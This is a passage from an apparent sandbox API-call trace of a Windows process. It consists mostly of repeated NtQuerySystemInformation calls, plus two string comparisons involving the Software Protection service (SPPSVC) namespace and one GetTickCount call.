Length=0x0, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0226.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x28, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x28, ResultLength=0x0) [0226.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x28, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x28, ResultLength=0x0) [0226.478] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef70, Length=0x28, ResultLength=0x0) [0226.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0226.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x20, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x20, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feee0, Length=0x20, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feee0, Length=0x20, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x28, ResultLength=0x0) [0226.491] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x50, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef70, Length=0x28, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0226.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x20, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0226.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x20, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feee0, Length=0x20, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feee0, Length=0x20, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff400, Length=0x50, ResultLength=0x0) [0226.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff400, Length=0x50, ResultLength=0x0) [0226.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff400, Length=0x50, ResultLength=0x0) [0226.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff350, Length=0x38, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff290, Length=0x28, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a8, Length=0x50, ResultLength=0x0) [0226.505] GetTickCount () returned 0x11790c9 [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff078, Length=0x58, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x38, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x28, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x28, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x28, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x28, ResultLength=0x0) [0226.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x28, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x38, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation 